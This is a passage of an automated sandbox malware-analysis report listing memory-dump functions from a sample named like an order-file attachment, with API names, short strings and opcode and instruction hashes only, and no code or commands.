                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$@
                                                                                    • API String ID: 0-149943524
                                                                                    • Opcode ID: 43f3149309a849f4727bcfc0601822b6958b7b21062cba40a4b91203ad2af3b3
                                                                                    • Instruction ID: 2df4e89795d9c5f78766189060473fa9438d6cdcd916596460560dbfb189514c
                                                                                    • Opcode Fuzzy Hash: 43f3149309a849f4727bcfc0601822b6958b7b21062cba40a4b91203ad2af3b3
                                                                                    • Instruction Fuzzy Hash: E532EEB86087128BD724CF14C480B2EB7F6FF89744F52492EF98697294EB74D941CB92
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: ee59aa675d69987cc7b01ba2bb7c0dad3678cd8b4f90d9076b120e736b97e14d
                                                                                    • Instruction ID: 1f2eeb1722d1eecb02c1d60c651ff6c15d588aeb3eea519d5008b42953fdcf5f
                                                                                    • Opcode Fuzzy Hash: ee59aa675d69987cc7b01ba2bb7c0dad3678cd8b4f90d9076b120e736b97e14d
                                                                                    • Instruction Fuzzy Hash: 2331CD31302B02AFE752DB21C980EAAFBB6BF44754F010165E90487A55DBB1F821CFD0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Legacy$UEFI
                                                                                    • API String ID: 2994545307-634100481
                                                                                    • Opcode ID: 1a2c0f0d18f5f149a305f3b31e2d6138cad3bf3778ba05f72c73150b0ca1bcc3
                                                                                    • Instruction ID: 79d16327bf5ee10a237de2190d60d682b8fddce17a72c1b93a5b60389100e285
                                                                                    • Opcode Fuzzy Hash: 1a2c0f0d18f5f149a305f3b31e2d6138cad3bf3778ba05f72c73150b0ca1bcc3
                                                                                    • Instruction Fuzzy Hash: 29614CB1E047499FEB19CFA8C840AAEB7F9FF48740F544069E549EB251EB70D940CB51
                                                                                    Strings
                                                                                    • RedirectedKey, xrefs: 352AB60E
                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 352AB5C4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                    • API String ID: 0-1388552009
                                                                                    • Opcode ID: 69d4cbf719bd392952edf18fe9cf8958ce211c42a1768a809dbce340f17deec9
                                                                                    • Instruction ID: f09eb5ad601f6c337025fe1349e3173292ae2424c0a59e1ac60f068ec874cfba
                                                                                    • Opcode Fuzzy Hash: 69d4cbf719bd392952edf18fe9cf8958ce211c42a1768a809dbce340f17deec9
                                                                                    • Instruction Fuzzy Hash: C06103B6C10219EBDB12CF94D888ADEBBB9FF08701F51406AF805A7251DB749A45CFA0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $$$
                                                                                    • API String ID: 3446177414-233714265
                                                                                    • Opcode ID: e6507e5b99e53035b79fb36ac0b5d6dd5dd505ce9eb4c671fabc4b23a397006b
                                                                                    • Instruction ID: a721f76961ee56e28e5efe7433e52275de8870580d99d9e7d7d6cc23728e44f6
                                                                                    • Opcode Fuzzy Hash: e6507e5b99e53035b79fb36ac0b5d6dd5dd505ce9eb4c671fabc4b23a397006b
                                                                                    • Instruction Fuzzy Hash: 3061CDB5B01B49CFEB20DFA4C584F9DB7F2BF44384F114469D905AB691CB75A980CB80
                                                                                    Strings
                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 351DA21B
                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 351DA229
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                    • API String ID: 0-2876891731
                                                                                    • Opcode ID: 42ff188a310b0132ae21e3418c65fb2a4ee324bed0802e9dd27ae5ec90bc4025
                                                                                    • Instruction ID: 9b9ff3d48587d2c4b613483dafdf7780167196d17d236a7e7096d8c04264f9ba
                                                                                    • Opcode Fuzzy Hash: 42ff188a310b0132ae21e3418c65fb2a4ee324bed0802e9dd27ae5ec90bc4025
                                                                                    • Instruction Fuzzy Hash: 43411FB4A04701CBEB01CFAAC480B6AB7F4FF45750F2044A5EC04EB2A1E776D980CB00
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                    • API String ID: 0-118005554
                                                                                    • Opcode ID: 6b14d5ed9d9454ab48cf382802c630033454e2266f3d4fb0bbf19f2eea708701
                                                                                    • Instruction ID: f8e01571cd52c0015c7ed63e058e9279cda3e6f523e27095c11b8ff14325f7cd
                                                                                    • Opcode Fuzzy Hash: 6b14d5ed9d9454ab48cf382802c630033454e2266f3d4fb0bbf19f2eea708701
                                                                                    • Instruction Fuzzy Hash: CE31DE7621C7418BD301CB68D880B1AB7F8FF95718F1008AAF8598B381EBB1DD45C792
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .Local\$@
                                                                                    • API String ID: 0-380025441
                                                                                    • Opcode ID: e375edaf6c068e98dfc5d5ab0354ddfad10a212b913484be6e18501c2b344a3c
                                                                                    • Instruction ID: c9bf9abce511cbd7a45f286ac0802b7dd1ac6dde7b47ef994b2bc853501bf76f
                                                                                    • Opcode Fuzzy Hash: e375edaf6c068e98dfc5d5ab0354ddfad10a212b913484be6e18501c2b344a3c
                                                                                    • Instruction Fuzzy Hash: 5A317EB564A701AFD311CF28C980E5BBBF9FB95694F40092EF99983250D734DE088F92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                    • API String ID: 2994545307-4008356553
                                                                                    • Opcode ID: 45b7b5a4142be41b593637dfb7b3f234eb61377ce06e3d6c9fc1a021b697e7ef
                                                                                    • Instruction ID: 71972cf73317f515129424991f413ea87a454e388576ef854b348082d44f6c02
                                                                                    • Opcode Fuzzy Hash: 45b7b5a4142be41b593637dfb7b3f234eb61377ce06e3d6c9fc1a021b697e7ef
                                                                                    • Instruction Fuzzy Hash: 7401D1B2615700AFD312CF18CD05B227BF8FB44715F028979AA58C7990E734E908CF45
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: MUI
                                                                                    • API String ID: 0-1339004836
                                                                                    • Opcode ID: d7e5850b958009be8b77363eb2c4139980df21870f3de0895c87235ebeeafd2c
                                                                                    • Instruction ID: dcbc8bfb479c44bdb46a3c720d8b31c7d47b271704eede23d49199d652fa53e6
                                                                                    • Opcode Fuzzy Hash: d7e5850b958009be8b77363eb2c4139980df21870f3de0895c87235ebeeafd2c
                                                                                    • Instruction Fuzzy Hash: 3C826AB9E04348DBEB24CFA9C880BADF7F2FF48354F518569D859AB250DB709985CB40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 75371e0e40a77645c1dedfeb86e0c955c2317cf47f758a5ee3ce4c19e0c5881e
                                                                                    • Instruction ID: f266332eb0e8bc96ccb56db5e114d0d90b382f9cc45817f44c6a412a676eb86c
                                                                                    • Opcode Fuzzy Hash: 75371e0e40a77645c1dedfeb86e0c955c2317cf47f758a5ee3ce4c19e0c5881e
                                                                                    • Instruction Fuzzy Hash: F1E188B56183428FD304DF28C090A6AFBF1FF88344F058A6DE89987351DB71E946CB92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @[,5@[,5
                                                                                    • API String ID: 0-3770508435
                                                                                    • Opcode ID: 8d5232190f722fd8f2ace74eab3a01414948250db4d3c1a04de3e3f51557c470
                                                                                    • Instruction ID: 0c2b1450a72575ad6636df4d44a1b0dca37493807f9da49dda373d797f8d5990
                                                                                    • Opcode Fuzzy Hash: 8d5232190f722fd8f2ace74eab3a01414948250db4d3c1a04de3e3f51557c470
                                                                                    • Instruction Fuzzy Hash: 2132B3B5E01219DBDF14CF98D890BAFBBB2FF44744F150269E806AB391DB769901CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8d00b021f47abb0cf6682e2bfd827567b7a34d8d0cf8efa5b45da9fd9da6e893
                                                                                    • Instruction ID: b22be7bd1039157d7e10ea3b584a304f62297277f4f0c458ad19c530c58b738a
                                                                                    • Opcode Fuzzy Hash: 8d00b021f47abb0cf6682e2bfd827567b7a34d8d0cf8efa5b45da9fd9da6e893
                                                                                    • Instruction Fuzzy Hash: 02A115B5F05319AFEB21CBA4D844B9EBBB5BF04764F010365E904AB290DB789D44CBC1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: 543fcdf8480c485be392fc389f33359f7adc29c4407b575c12287571e6f8bb39
                                                                                    • Instruction ID: 9e9383358b6047a51b9704d7737682877c42c3d25bb740cfbad7b9f514296202
                                                                                    • Opcode Fuzzy Hash: 543fcdf8480c485be392fc389f33359f7adc29c4407b575c12287571e6f8bb39
                                                                                    • Instruction Fuzzy Hash: 02B100B96093818FD394CF28C480A5AFBF1BF89304F544A6EF89997352D771E945CB82
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ebfff2700db46e73c4e974f0526adf16998a7cc1d5b6b53f46ae66e2336916d2
                                                                                    • Instruction ID: 155fec45ea5d3ee1b1c47ed35731c20599f487d0c47ee53cb50edc4b0973b3a1
                                                                                    • Opcode Fuzzy Hash: ebfff2700db46e73c4e974f0526adf16998a7cc1d5b6b53f46ae66e2336916d2
                                                                                    • Instruction Fuzzy Hash: 83615076B00606AFDB48DF68C484BADFBF6BF48344F24866AD419A7341DB70A951CBD0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: 228e377d33386a879c9cc0ecf90b86e7e47385322635c4d54f6986078a42f3ff
                                                                                    • Instruction ID: 5352801dbbbb553e012ee1b84b9c6b1cde918e1683aea39bd9ec25b46ed65e39
                                                                                    • Opcode Fuzzy Hash: 228e377d33386a879c9cc0ecf90b86e7e47385322635c4d54f6986078a42f3ff
                                                                                    • Instruction Fuzzy Hash: B6419BB5601700CFD721CF28C950AA9F7F3BF48350F5182AAC42A9B2A1EB71A941CB41
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: 7720572593a1e4c2baae48956f515404d0b2959830f1fdf69fbdf78bd6b80540
                                                                                    • Instruction ID: c1ccef8e7bf5c82c478e48a0f42ff95b7f2b235fe000106b9ab83c008bcd2568
                                                                                    • Opcode Fuzzy Hash: 7720572593a1e4c2baae48956f515404d0b2959830f1fdf69fbdf78bd6b80540
                                                                                    • Instruction Fuzzy Hash: 7341C0746043818FD715CF68D894B3AFBEAFF81390F10442DE982872A1DBF0E855DA91
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: a5867741bafec5d1bde4467df956e662cb7796a373acfa7c59333b4444d63422
                                                                                    • Instruction ID: 1fbacf61de456ce0cabbe1e6de16105082499cc1c41e86f13443babb23b040ea
                                                                                    • Opcode Fuzzy Hash: a5867741bafec5d1bde4467df956e662cb7796a373acfa7c59333b4444d63422
                                                                                    • Instruction Fuzzy Hash: 5731EF726846049FC311CF24C880E5BB7AABF44360F5142E9E9169B292CB72ED42CBD0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: 36b96293d2e95cb333fb997ec5f692ae5e7e3fd6aec5f10fd4f093c05b6b2df6
                                                                                    • Instruction ID: 59b7d28d875a23734e9a879deb8526f88a371f2090b8a139dc7e31553f9b1efe
                                                                                    • Opcode Fuzzy Hash: 36b96293d2e95cb333fb997ec5f692ae5e7e3fd6aec5f10fd4f093c05b6b2df6
                                                                                    • Instruction Fuzzy Hash: 6C319A7A712A06EFE745DB24CA80E59FBB6FF84240F916065E80087A51DB71E830CF90
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: c601f2a358bd97f0781b1ee1ccb2fad50b12c870220f134a218b2f9270ae1853
                                                                                    • Instruction ID: feae950c1cdcde1c2ee7bd8869c6245142ee2415a766135a5ed901e3171d765c
                                                                                    • Opcode Fuzzy Hash: c601f2a358bd97f0781b1ee1ccb2fad50b12c870220f134a218b2f9270ae1853
                                                                                    • Instruction Fuzzy Hash: 51317CB55093028FC704DF29C44495ABBF6FF89354F458AAEE4989B252D730ED05CFA2
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: 9ab9ac4231206ea09eec6542c30bb450fa69c35e513e710ab1e97dd57a430916
                                                                                    • Instruction ID: 5243cca1b84bfbceb4b0e5ae5a98f2665fadf2ba9bdbb35fcd849920609f7fe1
                                                                                    • Opcode Fuzzy Hash: 9ab9ac4231206ea09eec6542c30bb450fa69c35e513e710ab1e97dd57a430916
                                                                                    • Instruction Fuzzy Hash: 6621C135605A40AFE7219F08C984F2AFBE6FF80B51F410599E8524B682CBB1ED49CBD1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: 3e5d49f128cdf433e7a0d945aefafcfdaa66c2baafca1c30be059d76ef9a1c48
                                                                                    • Instruction ID: adaafe4c5333d9496a115c4f002a1d1dc85203245662cd319cde5e8411c26f96
                                                                                    • Opcode Fuzzy Hash: 3e5d49f128cdf433e7a0d945aefafcfdaa66c2baafca1c30be059d76ef9a1c48
                                                                                    • Instruction Fuzzy Hash: B301853A210249AFDF028E84D845ECA7F66FB4C7A4F068501FE1966260C732E971EB90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: GlobalTags
                                                                                    • API String ID: 0-1106856819
                                                                                    • Opcode ID: 23e63d1ac1b75d62d243295f095f901726cb0fe31c60e4b68b71f4f08ed0eb67
                                                                                    • Instruction ID: 4a62273dc9beb4d469665b74019b41952b75d302ec74b304107f7076ae6047da
                                                                                    • Opcode Fuzzy Hash: 23e63d1ac1b75d62d243295f095f901726cb0fe31c60e4b68b71f4f08ed0eb67
                                                                                    • Instruction Fuzzy Hash: 007191F5E0531A9FDF18CF98C580ADDBBB2BF48750F14812EE809A7245DB75A941CB90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                    • Instruction ID: 4a31ed846326dcd847e12fc823d107d84cce2313f2d6ac299b5a6d496e473b14
                                                                                    • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                    • Instruction Fuzzy Hash: 7D615AB6E0521AEBDB11DFA9C840BEEBBF5FF84750F114169E814A7250DB749A01CFA0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                    • Instruction ID: f61797b85d71151b5b73ad7e8c8b7e1d19408071fee8572928a1d09a03d4cf3c
                                                                                    • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
